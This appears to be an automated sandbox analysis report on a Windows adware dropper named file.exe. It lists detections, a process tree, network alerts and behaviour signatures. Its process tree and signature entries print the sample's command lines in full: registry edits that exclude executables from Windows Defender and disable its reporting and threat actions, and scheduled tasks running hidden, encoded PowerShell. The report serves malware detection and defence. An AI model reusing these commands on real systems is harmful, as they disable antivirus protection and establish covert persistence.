Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:780219
MD5:f85e68ee713c8396beb1a86d8e2500f4
SHA1:b321bd443f2fc670acbcd8f629e7f0134235bd16
SHA256:26583795c29a238e069f2ecaf6960bcace1d82a2feaeef4194fafc52e5bd9457
Tags:exe
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Uses cmd line tools excessively to alter registry or file data
Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Performs DNS queries to domains with low reputation
Modifies Group Policy settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Creates job files (autostart)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Contains capabilities to detect virtual machines
Uses reg.exe to modify the Windows registry
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 4348 cmdline: C:\Users\user\Desktop\file.exe MD5: F85E68EE713C8396BEB1A86D8E2500F4)
    • Install.exe (PID: 4756 cmdline: .\Install.exe MD5: 27C94EBEBB6A848899409651E1C2B93D)
      • Install.exe (PID: 4728 cmdline: .\Install.exe /S /site_id "525403" MD5: FF818A3F7A85439624F8E4FDA13889C6)
        • forfiles.exe (PID: 1200 cmdline: C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64& MD5: 4329CB18F8F74CC8DDE2C858BB80E5D8)
          • conhost.exe (PID: 4404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 540 cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64& MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • reg.exe (PID: 4736 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
            • reg.exe (PID: 4776 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • forfiles.exe (PID: 4520 cmdline: C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64& MD5: 4329CB18F8F74CC8DDE2C858BB80E5D8)
          • conhost.exe (PID: 4892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 4660 cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64& MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • reg.exe (PID: 1340 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
            • reg.exe (PID: 4720 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • schtasks.exe (PID: 812 cmdline: schtasks /CREATE /TN "gYzDOohkP" /SC once /ST 07:29:03 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 5604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 5040 cmdline: schtasks /run /I /tn "gYzDOohkP" MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 5884 cmdline: schtasks /DELETE /F /TN "gYzDOohkP" MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 1456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 4120 cmdline: schtasks /CREATE /TN "bltLOfaNnqcomuNOFZ" /SC once /ST 16:17:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exe\" 6Q /site_id 525403 /S" /V1 /F MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 2740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • powershell.exe (PID: 2812 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA== MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 6016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • gpupdate.exe (PID: 5216 cmdline: "C:\Windows\system32\gpupdate.exe" /force MD5: 47C68FE26B0188CDD80F744F7405FF26)
      • conhost.exe (PID: 1716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • jKHLerL.exe (PID: 5684 cmdline: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exe 6Q /site_id 525403 /S MD5: FF818A3F7A85439624F8E4FDA13889C6)
    • powershell.exe (PID: 5920 cmdline: powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;" MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 3372 cmdline: "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32 MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • reg.exe (PID: 3224 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5316 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5476 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5472 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5580 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5524 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5536 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5620 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5644 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5636 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5812 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 4724 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 4664 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 3116 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
  • gpscript.exe (PID: 4320 cmdline: gpscript.exe /RefreshSystemParam MD5: C48CBDC676E442BAF58920C5B7E556DE)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Persistence and Installation Behavior

barindex
Sigma detected: Schedule system process
Source: Process startedAuthor: Joe Security: Data: Command: schtasks /CREATE /TN "gYzDOohkP" /SC once /ST 07:29:03 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==", CommandLine: schtasks /CREATE /TN "gYzDOohkP" /SC once /ST 07:29:03 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==", CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: .\Install.exe /S /site_id "525403", ParentImage: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exe, ParentProcessId: 4728, ParentProcessName: Install.exe, ProcessCommandLine: schtasks /CREATE /TN "gYzDOohkP" /SC once /ST 07:29:03 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==", ProcessId: 812, ProcessName: schtasks.exe

Snort Signatures

Timestamp:192.168.2.754.191.228.3749726802041922 01/08/23-16:17:27.579970
SID:2041922
Source Port:49726
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: file.exeReversingLabs: Detection: 36%
Antivirus detection for dropped file
Source: C:\Windows\Temp\HXDQertRGOTVyfYK\hElxpyKZHjbNPMc\rwZEaTv.exeAvira: detection malicious, Label: HEUR/AGEN.1209690
Source: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exeAvira: detection malicious, Label: HEUR/AGEN.1209690
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeAvira: detection malicious, Label: HEUR/AGEN.1209690
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\7zSD636.tmp\Install.exeReversingLabs: Detection: 40%
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeReversingLabs: Detection: 40%
Source: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exeReversingLabs: Detection: 40%
Source: C:\Windows\Temp\HXDQertRGOTVyfYK\hElxpyKZHjbNPMc\rwZEaTv.exeReversingLabs: Detection: 40%
Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040553A FindFirstFileA,
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA,
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Local\Temp\7zSD636.tmp\__data__\
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Local\Temp\
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Local\Temp\7zSD636.tmp\
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Local\
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\

Networking

barindex
Snort IDS alert for network traffic
Source: TrafficSnort IDS: 2041922 ET MALWARE Win32/Adware.Neoreklami.MI Activity M2 192.168.2.7:49726 -> 54.191.228.37:80
Performs DNS queries to domains with low reputation
Source: DNS query: api4.check-data.xyz
Source: DNS query: api4.check-data.xyz
Source: powershell.exe, 00000012.00000002.508261836.000002127BFC0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.422385482.00000000031A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000012.00000002.346158647.0000021262345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micr
Source: powershell.exe, 00000012.00000002.501402298.0000021273F0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.504531194.0000021274045000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000012.00000002.356255986.00000212640A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000012.00000002.346924306.0000021263EA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.422985802.00000000036E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000012.00000002.356255986.00000212640A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000012.00000002.504531194.0000021274045000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000012.00000002.504531194.0000021274045000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000012.00000002.504531194.0000021274045000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000012.00000002.356255986.00000212640A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000012.00000002.501402298.0000021273F0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.504531194.0000021274045000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: unknownDNS traffic detected: queries for: www.testupdate.info
Source: file.exe, 00000000.00000002.504759648.00000000007CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

barindex
Very long command line found
Source: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exeProcess created: Commandline size = 3260
Source: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exeProcess created: Commandline size = 3260
Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeFile deleted: C:\Windows\SysWOW64\GroupPolicyFpDoyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeFile created: C:\Windows\system32\GroupPolicy\gpt.iniJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004162A6
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040E5A5
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004126B0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403A01
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418EF1
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418FCB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_0693FC20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_069378F0
Source: C:\Users\user\Desktop\file.exeCode function: String function: 00403A9C appears 33 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 00413954 appears 177 times
Source: file.exe, 00000000.00000000.241737223.0000000000427000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename7zS.sfx.exe, vs file.exe
Source: file.exeBinary or memory string: OriginalFilename7zS.sfx.exe, vs file.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exe 6267F16C7A74D8C26F6D6CBE39E28044F55ECF16D82CBDFFBC1EFD3625393C42
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exe 6267F16C7A74D8C26F6D6CBE39E28044F55ECF16D82CBDFFBC1EFD3625393C42
Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\HXDQertRGOTVyfYK\hElxpyKZHjbNPMc\rwZEaTv.exe 6267F16C7A74D8C26F6D6CBE39E28044F55ECF16D82CBDFFBC1EFD3625393C42
Source: file.exeReversingLabs: Detection: 36%
Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSD636.tmp\Install.exe .\Install.exe
Source: C:\Users\user\AppData\Local\Temp\7zSD636.tmp\Install.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exe .\Install.exe /S /site_id "525403"
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
